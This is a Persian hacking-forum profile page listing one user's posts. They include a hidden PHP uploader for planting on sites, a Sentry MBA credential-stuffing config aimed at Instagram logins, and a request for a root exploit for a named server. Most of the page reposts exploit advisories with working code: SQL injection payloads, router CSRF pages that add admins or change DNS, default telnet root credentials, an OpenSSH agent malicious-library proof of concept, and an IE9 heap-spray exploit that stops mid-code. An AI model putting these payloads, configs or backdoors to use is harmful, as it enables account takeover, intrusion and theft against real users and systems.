رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

M0RF!N

Member
  • تعداد ارسال ها

    85
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

1 دنبال کننده

Converted

  • Name
    M0RF!N
  • Main os
    Windows
  • Programming language
    خیر
  1. M0RF!N

    Icsg Uploader

    سلام دوستان فایلی که براتون ضمیمه کردم ICSG Uploader هست . یک آپلودر مخفی که باید با متود گت اونو بالا بیارین و حالت عادی به کسی که وارد صفحه میشه خطای 404 نشون میده . نحوه استفاده : http://example.com/hidden.php?pass=icsg hidden.rar
  2. M0RF!N

    کانفیگ سایت های مختلف ( مهم )

    Config Instagram ( Proxyless And Full Capture ) - Bot Between 1 to 10 [Wordlist] UserIndex=1 PassIndex=2 EmailIndex=0 E0F9C6B9D1B07AEB42007C5E58E463A2=0 [settings] SiteURL=https://www.instagram.com/ Timeout=20 WaitBot=0 ResolveHost=0 ComboFilter=0 UsernameStart=6 UsernameEnd=8 PasswordStart=6 PasswordEnd=8 ComboMode=0 Letters=0 Digits=0 Alpha=0 Email=0 LowerUpper=0 LetterDigit=0 SpeciaChar=0 PasswordLetters=0 PasswordDigits=0 PasswordAlpha=0 PasswordEmail=0 PasswordLowerUpper=0 PasswordLetterDigit=0 PasswordSpeciaChar=0 EmailFilter=0 EmailMode=0 ProxyActivate=10 ProxyRatio=4 ProxyCombo=0 WaitTime=1 BanWindowWidth=1 BanWindowProxies=10 BanWindowRatio=10 blnNoProxies=1 RequestMethod=2 Referer=2 HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://www.instagram.com/|User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0|Host: <HOST>|Pragma: no-cache|Connection: keep-alive| POSTData=username=<USER>&password=<PASS> [Fake] AfterFP=0 FollowRedirect=1 EnableConHits=0 Success=3 ConHits=0 EnableConLength=0 SourceTags=1 ConLength=-1 blnSuccess=0 SuccessRetries=3 blnForbToOK=1 ForbToOkLength=1000 blnBadOcrCode=0 BadOcrCodeRetries=3 blnCompleteNot=1 HTTPFollow=1 blnProcessErrors=1 blnInvalidPath=1 UserField=0 [Keywords] HeaderFail= HeaderSuccess= HeaderBan= HeaderRetry= SourceFail=authenticated": false;The link you followed may be broken, or the page may have been removed. SourceSuccess=checkpoint_required;authenticated": true;Followers SourceBan= SourceRetry= EnableHeaderFail=0 EnableHeaderSuccess=0 EnableHeaderBan=0 EnableHeaderRetry=0 EnableSourceFail=1 EnableSourceSuccess=1 EnableSourceBan=0 EnableSourceRetry=0 EnableGlobalSourceRetry=1 [Form] IAParse=0 blnBasic=0 Action=https://www.instagram.com/accounts/login/ajax/ Username=username Password=password Email= CustomData= NoIndex= AddData= Cookie=mid=WAHxhwAEAAGD2VkMgSbXRTXuwZ-F; ig_vw=1024; ig_pr=1; csrftoken=nrYx97yIDN8MqdtFrXUj1R9owjDwQwHw IAction=-1 IUser=-1 IPass=-2 IEmail=-2 ICaptcha=-1 ReqReferer= ReqCookie= AjaxURL= AjaxPOSTData= AjaxData= AjaxParsingCode= RefData= ParsingCode= FormRedirectUrl= RedPostData= LoginPostData= RedKeys= DataDesc=Followers&Following&Posts&Is_Private&Orginal CaptureParsingCode=<meta property="og:description" content="| Followers, * Following, ** Posts - See Instagram photos and videos from *|#00|#00|0|#00|#00|0&Followers, | Following|#00|#00|0|#00|#00|0&Following, | Posts|#00|#00|0|#00|#00|0& "is_private": |, "|#00|#00|0|#00|#00|0&"is_verified": |, "|#00|#00|0|#00| WickedGod|0 RefreshSession=0 RefreshCookie=1 IAMethod=2 POSTMethod=2 RedMethod=1 LoginMethod=1 AjaxHeader=0 FormHeader=1 RedHeader=0 LoginHeader=0 ImageAfterAjax=0 FollowRedirectsOnIA=0 FollowRedirectsOnRed=1 [Ajax] Variables=csrftoken||Login Page||None||Costant||x-csrftoken: ||&||None||Cookie||csrftoken=||-1||-1||0||0||0||0&&ajax||Login Page||None||csrftoken||||&||None||Costant||\nx-instagram-ajax: 1||0||-1||0||0||0||0 PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&ajax&&None&&None&&None&&None&&None&&None&&None&&None RedURL=https://www.instagram.com/<USER> [OCR] OCRMode=0 URLMode=0 ImageURLID=|| Captcha= OCRKey= RefreshCaptcha=0 blnContrast=0 blnBrightness=0 blnSaturation=0 blnThreshold=0 blnInvert=0 blnNoise=0 blnIsolate=0 blnResize=0 blnBorder=0 blnCharExtract=0 blnRemoveColors=0 blnStringFilter=0 blnLetter=1 blnDigits=1 blnBlur=0 blnReconstruct=0 blnLower=0 blnUpper=0 blnRemoveLines=0 blnMultiChar=0 blnPalette=0 blnCharResize=0 blnCharSubExtraction=0 blnGif=0 blnCompute=0 blnBorderPre=0 Contrast=0 Brightness=0 Saturation=0 Threshold=0 Noise=1 Isolate=1 Resize=2 BorderLeft=0 BorderTop=0 BorderRight=0 BorderBottom=0 CharExtractMinBlack=0 CharExtractMaxBlack=1 CharExtractMinWidth=1 CharRotateMax=0 CharRotateSteps=5 MinLength=1 MaxLength=10 BlurRadius=1 CharExtractMaxWidth=33 CharWidthMinBlack=2 CharSpace=1 Range=0 InvertDensity=0 InvertLength=20 LineCurvatureMax=4 LineWidthMax=13 CharResize=1 CharHeight=13 GifStart=2 GifOffset=2 BorderLeftPre=0 BorderTopPre=0 BorderRightPre=0 BorderBottomPre=0 CharBorderH=5 CharBorderV=5 CharRotateBorder=5 CharExtractMinHeight=1 VerticalRejoin=30 CharExclude= SpecialChars= Colors= Colors2= Lines=Min Length: 2, Max Width: 5, Horizzontal Language=eng
  3. سلام طبق بررسی های انجام شده مثل اینکه این پیام رسان باگ داره و باگش هم برای مدیریت این اپلیکیشن ارسال شده ! در کل زیاد به اپلیکیشن های ایرانی اعتماد نکنین چون امنیتشون درحد قابل قبولی نیست
  4. سلام ... خیلی هم عالی ... برای به حال اول برگشتن اسکریپتی ننوشتین ؟
  5. M0RF!N

    کانفیگ اینستاگرام

    سلام .. کانفیگ سالم اینستا گرام رو براتون پیوست کردم ... Bot رو روی 3 قرار بدید بهتره .. پ.ن : کانفیگ مخصوص برنامه Sentry Mba هست یاعلی instagram.rar
  6. M0RF!N

    درخواست لوکال روت !

    سلام... مرسی اما کار نکرد و روت نشد :(
  7. M0RF!N

    درخواست لوکال روت !

    سلام خدمت دوستان عزیز .... میخواستم ببینم کسی لوکال روت برای سرور زیر رو داره ؟ Linux server3.dn-server.com 2.6.32-673.26.1.lve1.4.15.el6.x86_64 #1 SMP Sun Jul 17 09:01:31 EDT 2016 x86_64
  8. درود... امروز براتون یک سری افزونه معرفی میکنم که تو جمع آوری اطلاعات و تست بعضی باگ ها روی تارگت بدردتون میخوره . 1 - Xss Me افزونه ای جهت تست آسیب پذیری Xss در سایت ها . https://addons.mozilla.org/en-us/firefox/addon/xss-me/ 2 - Sql Inject Me افزونه ای جهت تست آسیب پذیری Sql در سایت ها . https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/ 3 - Tamper Data & Live Http Header ابزاری برای مشاهده و ویرایش هدر های Http و Https و پارامتر های Post . https://addons.mozilla.org/En-us/firefox/addon/tamper-data/ https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/ 4 - Wappalyzer ابزاری برای شناسای نوع Cms و ابزار استفاده شده و ... . https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ 5 - Domain Details ارائه اطلاعات جزیی درباره دامنه ها مثل Whois،IP Address، نوع سرور و... . https://addons.mozilla.org/en-US/firefox/addon/domain-details/
  9. M0RF!N

    Openssh < 7.4 - Agent Protocol Arbitrary Library Loading

    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009 The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine. To reproduce the issue, first create a library that executes some command when it is loaded: $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through system() unsetenv("LD_PRELOAD"); unsetenv("LD_LIBRARY_PATH"); system("id > /tmp/test"); } $ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall Connect to another machine using "ssh -A". Then, on the remote machine: $ ssh-add -s [...]/evil_lib.so Enter passphrase for PKCS#11: [just press enter here] SSH_AGENT_FAILURE Could not add card: [...]/evil_lib.so At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent: $ cat /tmp/test uid=1000(user) gid=1000(user) groups=[...] Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
  10. # Exploit Title: Unauthenticated SQL injeciton in 404 plugin for Wordpress v1.0 # Google Dork: N/A # Date: 17/12/2016 # Exploit Author: Ahmed Sherif (Deloitte) # Vendor Homepage: N/A # Software Link: https://wordpress.org/plugins/404-redirection-manager/ # Version: V1.0 # Tested on: Linux Mint # CVE : N/A The plugin does not properly sanitize the user input. Hence, it was vulnerable to SQL injection. The vulnerable page is : custom/lib/cf.SR_redirect_manager.class.php on line 356 [#] Proof of Concept (PoC): GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp-settings-time-1=1480877693 Connection: close*
  11. M0RF!N

    Joomla! Component Dt Register - 'cat' Sql Injection

    Title: SQL injection in Joomla extension DT Register Credit: Elar Lang / https://security.elarlang.eu Vulnerability: SQL injection Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5) CVE: pending Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html Vendor: DTH Development Vendor URL: http://www.dthdevelopment.com/ Product: DT Register "Calendar & Event Registration" Product URL: https://extensions.joomla.org/extension/dt-register Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html # Background "DT Register is the Joomla Event Registration component that gives you functionality beyond what any other event booking solution can offer" (https://extensions.joomla.org/extension/dt-register) # Vulnerability SQL injection in Joomla extension "DT Register" by DTH Development allows remote unauthenticated attacker to execute arbitrary SQL commands via the cat parameter. # Preconditions No pre-conditions for authentication or authorization. # Proof-of-Concept http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events PoC value (shows out all events / it's possible to see valid eventId values): cat[0]=6) OR 1-- - ## Using UNION For reading the data out using UNION it's important to have and to know one valid eventId (detected in previous step). In total there are 112 fields in select query, eventId position is no 13. For output is best to use position 112. Step-by-Step - how to read the data out is available in blog: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html # Vulnerability Disclosure Timeline Full communication is available in blog: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html 2016-10-17 | me > DTH | via web form - I would like to report some security holes. What is the correct way for that? 2016-10-18 | me > DTH | any response? 2016-10-25 | me > DTH | mail to [email protected] 2016-10-25 | DTH > me | * "you are not in our client list" * "Our site (dthdevelopment.com) is protected by an enterprise grade firewall" 2016-10-25 | me > DTH | I'm whitehat, technical details 2016-10-25 | DTH > me | description, what kind of serious problems I may face 2016-10-25 | me > DTH | explanations 2016-11-02 | me > DTH | hello? 2016-11-11 | me > DTH, SiteLock | Last call. 2016-11-11 | SiteLock / DTH / me | some communication 2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open in the setup" 2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5) 2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed the problem on our demo site". 2016-12-12 | me | Full Disclosure on security.elarlang.eu 2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org ## asking CVE from DWF (Distributed Weakness Filing Project) / http://iwantacve.org 2016-10-20 | me > DWF | CVE request 2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for CVE Assignment" 2016-10-31 | me > DWF | I accept 2016-11-19 | me > DWF | Any feedback or decision? (still no response) 2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response) As I haven't got any feedback, you can take this post as CVE request. # Fix DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5). -- Elar Lang Blog @ https://security.elarlang.eu Pentester, lecturer @ http://www.clarifiedsecurity.com
  12. M0RF!N

    Arg-w4 Adsl Router

    # Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities # Date: 2016-12-11 # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM # Tested on: Windows AND Linux # Exploit Demo : http://persian-team.ir/showthread.php?tid=196 1 - Denial of Service #!/usr/bin/python import urllib2 import urllib site=raw_input("Enter Url : ") site=site+"/form2Upnp.cgi" username='admin' password='admin' p = urllib2.HTTPPasswordMgrWithDefaultRealm() p.add_password(None, site, username, password) handler = urllib2.HTTPBasicAuthHandler(p) opener = urllib2.build_opener(handler) urllib2.install_opener(opener) post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'} data = urllib.urlencode(post) try: html = urllib2.urlopen(site,data) print ("Done ! c_C") except: print ("Done ! c_C") 2-1 Cross-Site Request Forgery (Add Admin) <html> <body> <form action="http://192.168.1.1/form2userconfig.cgi" method="POST"> USER:<input type="text" name="username" value="mobham" /> <input type="hidden" name="privilege" value="2" /> PWD:<input type="text" name="newpass" value="mobham" /> RPWD:<input type="texr" name="confpass" value="mobham" /> <input type="hidden" name="adduser" value="Add" /> <input type="hidden" name="hiddenpass" value="" /> <input type="hidden" name="submit.htm?userconfig.htm" value="Send" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2-2 Cross-Site Request Forgery (Change DNS) <html> <body> <form action="http://192.168.1.1/form2Dns.cgi" method="POST"> <input type="hidden" name="dnsMode" value="1" /> DNS<input type="text" name="dns1" value="2.2.2.2" /> DNS 2<input type="text" name="dns2" value="1.1.1.1" /> DNS 3<input type="text" name="dns3" value="" /> <input type="hidden" name="submit.htm?dns.htm" value="Send" /> <input type="hidden" name="save" value="Apply Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  13. M0RF!N

    Android - Inter-process Munmap

    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=928 Bitmap objects can be passed between processes by flattening them to a Parcel in one process and un-flattening them in another. In order to conserve memory, there exists a code path which allows Bitmaps to be shared between processes by providing an ashmem-mapped file descriptor containing the Bitmap's raw pixel data. The android.graphics.Bitmap class illegally assumes that the size of the ashmem region provided by the user matches the actual underlying size of the Bitmap. When un-flattening a Bitmap from a Parcel, the class first calculates the assumed size of the Bitmap from the user-provided dimensions. Then, it calls Parcel::readBlob in order to map the given ashmem file descriptor to the process's VAS. This mapping is done using the size calculated from the Bitmap's dimensions (and not the size of the underlying ashmem descriptor). Later, the Bitmap constructor internally stores the ashmem file descriptor and mapped memory address, along with the size of the mapping. However, instead of using the same calculated size which was used when mapping the shared memory region, it accidentally queries the ashmem region for its real size, like so: mPixelStorage.ashmem.size = ashmem_get_size_region(fd); This size can be completely controlled by an attacker (simply by calling ASHMEM_SET_SIZE), and may be arbitrary large. Later, when the Bitmap is GC-ed, the destructor triggers a call to Bitmap::doFreePixels which unmaps the Bitmap's data, by calling: munmap(mPixelStorage.ashmem.address, mPixelStorage.ashmem.size); This means that an attacker can cause the size of the unmapped region to be arbitrarily large, thus unmapping crucial regions in the remote process's VAS. One example of how this can be exploited is by unmapping the remote process's heap (which is directly after the mmap-ed ranges on the device I was working on). Then, the attacker can resend a large Bitmap which will be mapped over the (previously unmapped) heap, thus allowing the attacker to effectively replace the remote process's heap with controlled data. I've attached a short PoC which crashes system_server by repeatedly unmaps large memory regions. Suggested Fix: Store the calculated size in mPixelStorage.ashmem.size instead of calling ashmem_get_size_region. Here's a brief run-down of the exploit: 1. The exploit begins by calling AudioService.unloadSoundEffects in order to close the SoundPool instance in system_server. This also closes any auxiliary threads (SoundPool, SoundPoolThread, etc.) that are associated with this pool. 2. Now, we start "massaging" system_server's VAS. This is done by creating multiple "Notification" objects which contain Bitmaps that are of exactly the same size at a thread's stack, when created by the ART runtime. As the bitmaps are allocated by using "mmap", they will simply inhabit the highest memory address between mm->mmap_base and TASK_SIZE which contains a sufficiently large contiguous hole. Causing many allocations of the aforementioned size will ensure that any "holes" of this size in higher addresses are filled, and the remaining "mmap"-s of this size will be contiguous. 3. Now that we are certain allocations of size THREAD_SIZE are contiguous, we replace one of notifications created in the previous stage with a notification containing a small (or empty) bitmap, and immediately send multiple dummy transactions to system_server in order to force garbage collection of the freed bitmap object. This will enable us to open up a "hole" in the contiguous allocations, like so: <--low high--> ---------------------------------------------------------------- | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | Bitmap | ---------------------------------------------------------------- || \/ <--low high--> ---------------------------------------------------------------- | Bitmap | Bitmap ||||hole|||| Bitmap | Bitmap | Bitmap | Bitmap | ---------------------------------------------------------------- 4. Now that there's a THREAD_SIZE-sized hole opened up, we can call AudioSystem.loadSoundEffects() in order to re-create the SoundPool object within system_server. This will allocate a new "SoundPoolThread" thread in system_server, which (after brief initialization) enters a polling loop on a condition variable (or rather, a futex), waiting for messages to be enqueued. However, this thread's stack will be directly mmap-ed in our previously created hole, like so: <--low high--> --------------------------------------------------------------------------- | Bitmap | Bitmap |SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | --------------------------------------------------------------------------- 6. Now, similarly to step 3., we can free the chunk directly before the previously unmapped chunk, creating the following state: <--low high--> ----------------------------------------------------------------------------- | Bitmap ||||hole||||SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | ----------------------------------------------------------------------------- 6. Finally, we send our "poisoned" bitmap object, which should get allocated directly in front of the SoundPoolThread's stack. Then, we force garbage collection once more, resulting in both the bitmap and the SoundPoolThread's stack being unmapped. However, since the SoundPoolThread is still waiting on a futex, this is fine. Here's what this stage looks like: <--low high--> -------------------------------------------------------------------------------- | Bitmap |Poison Bitmap|SoundPoolThread stack| Bitmap | Bitmap | Bitmap | Bitmap | -------------------------------------------------------------------------------- || \/ <--low high--> -------------------------------------------------------------------------------- | Bitmap ||||||||||||||||hole||||||||||||||||| Bitmap | Bitmap | Bitmap | Bitmap | -------------------------------------------------------------------------------- 7. At this point we can enqueue another notification, this time backed by a specially crafted ashmem file, containing two separate pieces of information: a. A chunk of position independent ARM/ARM64 code, followed by b. A ROP stack This notification will be of size THREAD_SIZE*2, and will therefore fill up the hole we just set up, resulting in the following state: <--low high--> ------------------------------------------------------------------- | Bitmap | PIC code | ROP Stack | Bitmap | Bitmap | Bitmap | Bitmap | ------------------------------------------------------------------- 8. Now, we can safely call AudioService.unloadSoundEffects() once more. This will signal the condition variable that SoundPoolThread was waiting on, but now when it returns it will be executing our own ROP stack. The ROP stack simply mmap-s the ashmem file descriptor with PROT_EXEC and jumps into it (essentially executing the PIC code we supplied). Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip
  14. M0RF!N

    Shuttle Tech Adsl Wireless 920 Wm

    ###################### # Exploit Title : Shuttle Tech ADSL WIRELESS 920 WM - Multiple Vulnerabilities # Version: Gan9.8U6X-B-TW-R1B020_1T1RP # Exploit Author : Persian Hack Team # Tested on [ Win ] # Date 2016/12/05 ###################### 1. Cross Site Scripting PoC : First We Need To login To Panel And page Parameter Vulnerable to Cross Site Scripting http://192.168.1.1/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E 2. Default Telnet Root Password.txt PoC : Username:root Password:root telnet 192.168.1.1 (none) login: root Password:root ~ $ cat /proc/version Linux version 2.6.19 ([email protected]) (gcc version 3.4.6-1.3.6) #3 Fri May 18 13:09:57 CST 2012 3. Directory Traversal.txt PoC : First We Need To login To Panel And getpage Parameter Vulnerable to Local File Disclosure http://192.168.1.1/cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page=
  15. M0RF!N

    Microsoft Internet Explorer Jscript9

    <!-- Source: http://blog.skylined.nl/20161206001.html Synopsis A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. A pointer set up to point to certain data on the stack can be used after that data has been removed from the stack. This results in a stack-based analog to a heap use-after-free vulnerability. The stack memory where the data was stored can be modified by an attacker before it is used, allowing remote code execution. Known affected software and attack vectors Microsoft Internet Explorer 9 An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path. Repro.html: <!doctype html> <script> var oWindow = window.open("about:blank"); oWindow.execScript('window.oURIError = new URIError();oURIError.name = oURIError;') try { "" + oWindow.oURIError; } catch(e) { } try { "" + oWindow.oURIError; } catch(e) { } </script> Description A Javascript can construct an URIError object and sets that object's name property to refer to the URIError object, creating a circular reference. When that Javascript than attempts to convert the URIError object to a string, MSIE attempts to convert the URIError object's name to a string, which creates a recursive code loop that eventually causes a stack exhaustion. MSIE attempts to handle this situation gracefully by generating a JavaScript exception. While generating the exception, information about the call stack is gathered using the JavascriptStackWalker class. It appears that the code that does this initializes a pointer variable on the stack the first time it is run, but re-uses it if it gets called a second time. Unfortunately, the information the pointer points to is also stored on the stack, but is removed from the stack after the first exception is handled. Careful manipulation of the stack during both exceptions allow an attacker to control the data the pointer points to during the second exception. This problem is not limited to the URIError object: any recursive function call can be used to trigger the issue, as shown in the exploit below. Exploit As mentioned above, the vulnerable pointer points to valid stack memory during the first exception, but it is "popped" from the stack before the second. In order to exploit this vulnerability, the code executed during the first exception is going to point this pointer to a specific area of the stack, while the code executed during the second is going to allocate certain values in that same area before the pointer is re-used. Control over the stack contents during a stack exhaustion can be achieved by making the recursive calls with many arguments, all of which are stored on the stack. This is similar to a heap-spray storing values on large sections of the heap in that it is not entirely deterministic, but the odds are very highly in favor of you setting a certain value at a certain address. The exploit triggers the first exception by making recursive calls using a lot of arguments. In each loop, a lot of stack space is needed to make the next call. At some point there will not be enough stack space left to make another call and an exception is thrown. If N arguments are passed during each call, N*4 bytes of stack are needed to store them. The number of bytes left on the stack at the time of the exception varies from 0 to about 4*N and thus averages to about 4*N/2. The vulnerable pointer gets initialized to point to an address near the stack pointer at the time of the exception, at approximately (bottom of stack) + 4*N/2. The exploit then triggers another stack exhaustion by making recursive calls using many arguments, but significantly less than before. If M arguments are passed during each call this time, the number of bytes left on the stack at the time of the exception averages to about 4*M/2. When the second exception happens, the vulnerable pointer points inside the stack that was "sprayed" with function arguments. This means we can control where it points to. The pointer is used as an object pointer to get a function address from a vftable, so by using the right value to spray the stack, we can gain full control over execution flow. The below schematic shows the layout of the stack during the various stages of this exploit: | | |<- bottom of stack top of stack ->| | | | Stack layout at the moment the first exception is triggered: | | | | [--- CALL X ---][-- CALL X-1 --][-- CALL X-2 --][...........]| | | |{---------------} Stack space available is less than 4*N bytes | | | | ^^^ | | Vulnerable pointer gets initialized to point around here | | | | | | | | Stack layout at the moment the second exception is triggered: | | | | [CALL Y][CALL Y-1][CALL Y-2][CALL Y-3][CALL Y-3][........................]| | | |{--} Stack space available is less than 4*M bytes | | | | ^^^ | | Vulnerable pointer still points around here, most likely at | | one of the arguments pushed onto the stack in a call. | | | In the Proof-of-Concept code provided below, the first exception is triggered by recursively calling a function with 0x2000 arguments (N = 0x2000). The second exception is triggered by recursively calling a function with 0x200 arguments (M = 0x200). The values passed as arguments during the second stack exhaustion are set to cause the vulnerable pointer to point to a fake vftable on the heap. The heap is sprayed to create this fake vftable. A fake function address is stored at 0x28000201 (pTarget) that points to a dummy shellcode consisting of int3's at 0x28000300 (pShellcode). Once the vulnerability is triggered, the vulnerable pointer is used to read the pointer to our shellcode from our fake vftable and called, which will attempt to execute our shellcode. Sploit.html: --> <!doctype html> <script src="String.js"></script> <script src="sprayHeap.js"></script> <script> function stackOverflowHighOnStack() { stackOverflowHighOnStack.apply(0, new Array(0x2000)); } function attack(pTarget) { var axArgs = []; while (axArgs.length < 0x200) axArgs.push((pTarget - 0x69C) >>> 1); exceptionLowOnStackWithSpray(); function exceptionLowOnStackWithSpray() { try { (function(){}).apply(0, axArgs); } catch (e) { throw 0; } exceptionLowOnStackWithSpray.apply(0, axArgs); } } var pSprayStartAddress = 0x09000000; var dHeapSprayTemplate = {}; var pTarget = 0x28000201; var pShellcode = 0x28000300; dHeapSprayTemplate[pTarget] = pShellcode; dHeapSprayTemplate[pShellcode] = 0xCCCCCCCC; window.sHeapSprayBlock = createSprayBlock(dHeapSprayTemplate); window.uHeapSprayBlockCount = getSprayBlockCount(dHeapSprayTemplate, pSprayStartAddress); var oWindow = window.open("about:blank"); function prepare() { window.asHeapSpray = new Array(opener.uHeapSprayBlockCount); for (var i = 0; i < opener.uHeapSprayBlockCount; i++) { asHeapSpray[i] = (opener.sHeapSprayBlock + "A").substr(0, opener.sHeapSprayBlock.length); } } oWindow.eval("(" + prepare + ")();"); try { String(oWindow.eval("({toString:" + stackOverflowHighOnStack + "})")); } catch(e) { oWindow.eval("(" + attack + ")(" + pTarget + ")"); } </script> <!-- String.js: String.fromWord = function (wValue) { // Return a BSTR that contains the desired DWORD in its string data. return String.fromCharCode(wValue); } String.fromWords = function (awValues) { // Return a BSTR that contains the desired DWORD in its string data. return String.fromCharCode.apply(0, awValues); } String.fromDWord = function (dwValue) { // Return a BSTR that contains the desired DWORD in its string data. return String.fromCharCode(dwValue & 0xFFFF, dwValue >>> 16); } String.fromDWords = function (auValues) { var asDWords = new Array(auValues.length); for (var i = 0; i < auValues.length; i++) { asDWords[i] = String.fromDWord(auValues[i]); } return asDWords.join(""); } String.prototype.repeat = function (uCount) { // Return the requested number of concatenated copies of the string. var sRepeatedString = "", uLeftMostBit = 1 << (Math.ceil(Math.log(uCount + 1) / Math.log(2)) - 1); for (var uBit = uLeftMostBit; uBit > 0; uBit = uBit >>> 1) { sRepeatedString += sRepeatedString; if (uCount & uBit) sRepeatedString += this; } return sRepeatedString; } String.createBuffer = function(uSize, uIndexSize) { // Create a BSTR of the right size to be used as a buffer of the requested size, taking into account the 4 byte // "length" header and 2 byte "\0" footer. The optional argument uIndexSize can be 1, 2, 4 or 8, at which point the // buffer will be filled with indices of said size (this is slower but useful for debugging). if (!uIndexSize) return "\uDEAD".repeat(uSize / 2 - 3); var auBufferCharCodes = new Array((uSize - 4) / 2 - 1); var uMSB = uIndexSize == 8 ? 8 : 4; // Most significant byte. for (var uCharIndex = 0, uByteIndex = 4; uCharIndex < auBufferCharCodes.length; uCharIndex++, uByteIndex +=2) { if (uIndexSize == 1) { auBufferCharCodes[uCharIndex] = uByteIndex + ((uByteIndex + 1) << 8); } else { // Set high bits to prevents both NULLs and valid pointers to userland addresses. auBufferCharCodes[uCharIndex] = 0xF000 + (uByteIndex % uIndexSize == 0 ? uByteIndex & 0xFFF : 0); } } return String.fromCharCode.apply([][0], auBufferCharCodes); } String.prototype.clone = function () { // Create a copy of a BSTR in memory. sString = this.substr(0, this.length); sString.length; return sString; } String.prototype.replaceDWord = function (uByteOffset, dwValue) { // Return a copy of a string with the given dword value stored at the given offset. // uOffset can be a value beyond the end of the string, in which case it will "wrap". return this.replaceWord(uByteOffset, dwValue & 0xFFFF).replaceWord(uByteOffset + 2, dwValue >> 16); } String.prototype.replaceWord = function (uByteOffset, wValue) { // Return a copy of a string with the given word value stored at the given offset. // uOffset can be a value beyond the end of the string, in which case it will "wrap". if (uByteOffset & 1) { return this.replaceByte(uByteOffset, wValue & 0xFF).replaceByte(uByteOffset + 1, wValue >> 8); } else { var uCharIndex = (uByteOffset >>> 1) % this.length; return this.substr(0, uCharIndex) + String.fromWord(wValue) + this.substr(uCharIndex + 1); } } String.prototype.replaceByte = function (uByteOffset, bValue) { // Return a copy of a string with the given byte value stored at the given offset. // uOffset can be a value beyond the end of the string, in which case it will "wrap". var uCharIndex = (uByteOffset >>> 1) % this.length, wValue = this.charCodeAt(uCharIndex); if (uByteOffset & 1) { wValue = (wValue & 0xFF) + ((bValue & 0xFF) << 8); } else { wValue = (wValue & 0xFF00) + (bValue & 0xFF); } return this.substr(0, uCharIndex) + String.fromWord(wValue) + this.substr(uCharIndex + 1); } String.prototype.replaceBufferDWord = function (uByteOffset, uValue) { // Return a copy of a BSTR with the given dword value store at the given offset. if (uByteOffset & 1) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") must be Word aligned"); if (uByteOffset < 4) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") 